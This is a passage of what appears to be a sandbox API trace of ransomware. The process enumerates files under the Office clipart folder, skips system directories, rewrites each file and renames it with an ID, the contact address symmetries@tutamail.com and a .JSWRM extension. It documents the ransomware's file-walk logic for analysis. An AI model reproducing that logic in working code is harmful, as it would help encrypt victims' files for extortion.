dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0078.741] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0078.741] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0078.741] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdeddf37, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdeddf37, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdf2a4e1, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2466, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="FINCL_02.MID", cAlternateFileName="")) returned 1 [0078.741] lstrcmpiW (lpString1="FINCL_02.MID", lpString2=".") returned 1 [0078.741] lstrcmpiW (lpString1="FINCL_02.MID", lpString2="..") returned 1 [0078.741] lstrcmpiW (lpString1="FINCL_02.MID", lpString2="...") returned 1 [0078.741] lstrcmpiW (lpString1="FINCL_02.MID", lpString2="windows") returned -1 [0078.741] lstrcmpiW (lpString1="FINCL_02.MID", lpString2="recovery") returned -1 [0078.741] lstrcmpiW (lpString1="FINCL_02.MID", lpString2="perflogs") returned -1 [0078.741] lstrcmpiW (lpString1="FINCL_02.MID", lpString2="documents and settings") returned 1 [0078.741] lstrcmpiW (lpString1="FINCL_02.MID", lpString2="$RECYCLE.BIN") returned 1 [0078.741] lstrcmpiW (lpString1="FINCL_02.MID", lpString2="system volume information") returned -1 [0078.741] lstrcmpiW (lpString1="FINCL_02.MID", lpString2="msocache") returned -1 [0078.741] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0078.741] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FINCL_02.MID", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0078.741] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FINCL_02.MID", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FINCL_02.MID", lpUsedDefaultChar=0x0) returned 12 [0078.741] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0078.741] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0078.741] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FINCL_02.MID", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0078.741] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FINCL_02.MID", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FINCL_02.MID", lpUsedDefaultChar=0x0) returned 12 [0078.741] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0078.741] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0078.741] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0078.741] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0078.741] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0078.741] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0078.741] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FINCL_02.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fincl_02.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0078.742] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=9318) returned 1 [0078.742] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.742] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2460) returned 0x24d210 [0078.742] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2460, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x2460, lpOverlapped=0x0) returned 1 [0078.743] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.744] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2460, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x2460, lpOverlapped=0x0) returned 1 [0078.744] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0078.744] CloseHandle (hObject=0x314) returned 1 [0078.744] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0078.744] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0078.744] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0078.744] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0078.744] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0078.744] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0078.744] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0078.744] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0078.744] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0078.744] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0078.744] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0078.744] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247898 [0078.744] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0078.744] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0078.744] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FINCL_02.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fincl_02.mid"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FINCL_02.MID.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fincl_02.mid.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0078.745] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247898 | out: hHeap=0x1e0000) returned 1 [0078.745] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0078.745] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0078.745] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdf50660, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdf50660, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdf50660, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x816, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="FLAP.WMF", cAlternateFileName="")) returned 1 [0078.745] lstrcmpiW (lpString1="FLAP.WMF", lpString2=".") returned 1 [0078.745] lstrcmpiW (lpString1="FLAP.WMF", lpString2="..") returned 1 [0078.745] lstrcmpiW (lpString1="FLAP.WMF", lpString2="...") returned 1 [0078.745] lstrcmpiW (lpString1="FLAP.WMF", lpString2="windows") returned -1 [0078.745] lstrcmpiW (lpString1="FLAP.WMF", lpString2="recovery") returned -1 [0078.745] lstrcmpiW (lpString1="FLAP.WMF", lpString2="perflogs") returned -1 [0078.745] lstrcmpiW (lpString1="FLAP.WMF", lpString2="documents and settings") returned 1 [0078.745] lstrcmpiW (lpString1="FLAP.WMF", lpString2="$RECYCLE.BIN") returned 1 [0078.745] lstrcmpiW (lpString1="FLAP.WMF", lpString2="system volume information") returned -1 [0078.745] lstrcmpiW (lpString1="FLAP.WMF", lpString2="msocache") returned -1 [0078.745] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0078.745] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FLAP.WMF", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0078.745] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FLAP.WMF", cchWideChar=8, lpMultiByteStr=0x345ebd8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FLAP.WMF", lpUsedDefaultChar=0x0) returned 8 [0078.745] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0078.745] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0078.745] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FLAP.WMF", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0078.745] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FLAP.WMF", cchWideChar=8, lpMultiByteStr=0x345eba8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FLAP.WMF", lpUsedDefaultChar=0x0) returned 8 [0078.745] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0078.745] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0078.745] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0078.745] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0078.745] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0078.745] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0078.745] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FLAP.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\flap.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0078.746] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2070) returned 1 [0078.746] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.746] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x810) returned 0x20c6c0 [0078.746] ReadFile (in: hFile=0x314, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x810, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x810, lpOverlapped=0x0) returned 1 [0078.748] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.748] WriteFile (in: hFile=0x314, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x810, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x810, lpOverlapped=0x0) returned 1 [0078.748] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0078.748] CloseHandle (hObject=0x314) returned 1 [0078.748] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0078.748] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0078.748] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0078.748] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0078.748] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0078.748] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0078.748] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0078.748] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2a0 [0078.748] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2a0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0078.748] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2a0 | out: hHeap=0x1e0000) returned 1 [0078.749] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0078.749] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0078.749] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0078.749] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0078.749] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0078.749] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0078.749] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FLAP.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\flap.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FLAP.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\flap.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0078.749] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0078.749] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0078.749] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0078.749] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdf50660, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdf50660, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdf76988, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1d8f, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="GRDEN_01.MID", cAlternateFileName="")) returned 1 [0078.750] lstrcmpiW (lpString1="GRDEN_01.MID", lpString2=".") returned 1 [0078.750] lstrcmpiW (lpString1="GRDEN_01.MID", lpString2="..") returned 1 [0078.750] lstrcmpiW (lpString1="GRDEN_01.MID", lpString2="...") returned 1 [0078.750] lstrcmpiW (lpString1="GRDEN_01.MID", lpString2="windows") returned -1 [0078.750] lstrcmpiW (lpString1="GRDEN_01.MID", lpString2="recovery") returned -1 [0078.750] lstrcmpiW (lpString1="GRDEN_01.MID", lpString2="perflogs") returned -1 [0078.750] lstrcmpiW (lpString1="GRDEN_01.MID", lpString2="documents and settings") returned 1 [0078.750] lstrcmpiW (lpString1="GRDEN_01.MID", lpString2="$RECYCLE.BIN") returned 1 [0078.750] lstrcmpiW (lpString1="GRDEN_01.MID", lpString2="system volume information") returned -1 [0078.750] lstrcmpiW (lpString1="GRDEN_01.MID", lpString2="msocache") returned -1 [0078.750] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0078.750] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GRDEN_01.MID", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0078.750] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GRDEN_01.MID", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GRDEN_01.MID", lpUsedDefaultChar=0x0) returned 12 [0078.750] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0078.750] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0078.750] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GRDEN_01.MID", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0078.750] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GRDEN_01.MID", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GRDEN_01.MID", lpUsedDefaultChar=0x0) returned 12 [0078.750] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0078.750] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0078.750] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0078.750] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0078.750] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0078.750] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0078.750] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\GRDEN_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\grden_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0078.751] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=7567) returned 1 [0078.751] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.751] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1d80) returned 0x205850 [0078.751] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1d80, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1d80, lpOverlapped=0x0) returned 1 [0078.753] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.753] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1d80, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1d80, lpOverlapped=0x0) returned 1 [0078.753] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0078.753] CloseHandle (hObject=0x314) returned 1 [0078.753] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0078.753] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0078.753] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0078.753] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0078.753] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0078.753] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0078.753] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0078.753] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0078.753] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0078.753] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0078.753] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0078.753] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0078.753] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0078.753] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0078.753] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\GRDEN_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\grden_01.mid"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\GRDEN_01.MID.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\grden_01.mid.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0078.754] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0078.754] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0078.754] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0078.754] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdf50660, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdf50660, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdf50660, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x18bb, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="GRID_01.MID", cAlternateFileName="")) returned 1 [0078.754] lstrcmpiW (lpString1="GRID_01.MID", lpString2=".") returned 1 [0078.754] lstrcmpiW (lpString1="GRID_01.MID", lpString2="..") returned 1 [0078.754] lstrcmpiW (lpString1="GRID_01.MID", lpString2="...") returned 1 [0078.754] lstrcmpiW (lpString1="GRID_01.MID", lpString2="windows") returned -1 [0078.754] lstrcmpiW (lpString1="GRID_01.MID", lpString2="recovery") returned -1 [0078.754] lstrcmpiW (lpString1="GRID_01.MID", lpString2="perflogs") returned -1 [0078.754] lstrcmpiW (lpString1="GRID_01.MID", lpString2="documents and settings") returned 1 [0078.754] lstrcmpiW (lpString1="GRID_01.MID", lpString2="$RECYCLE.BIN") returned 1 [0078.754] lstrcmpiW (lpString1="GRID_01.MID", lpString2="system volume information") returned -1 [0078.754] lstrcmpiW (lpString1="GRID_01.MID", lpString2="msocache") returned -1 [0078.754] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0078.754] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GRID_01.MID", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 